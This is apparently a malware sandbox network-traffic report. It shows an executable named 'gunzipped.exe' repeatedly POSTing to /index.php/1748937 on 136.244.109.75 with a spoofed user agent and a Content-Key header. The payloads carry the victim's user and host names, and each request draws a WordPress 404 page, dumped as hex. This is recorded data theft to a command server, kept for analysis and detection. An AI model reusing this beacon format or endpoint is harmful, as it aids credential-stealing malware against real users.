Apr 17, 2024 03:18:26.477631092 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:25 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:26.477698088 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:26.477735996 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:26.477756023 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:26.477781057 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:26.477801085 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:26.477822065 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:26.477855921 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:26.477894068 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:26.477993011 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49776	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:26.814059019 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:27.018201113 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:27.961832047 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:27.961890936 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:27.961930990 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:27.961971045 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:27.962012053 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:27.962052107 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:27.962094069 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:27.962136030 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:27.962174892 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:27.962215900 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49777	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:28.314688921 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:28.523677111 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:29.480891943 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:28 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 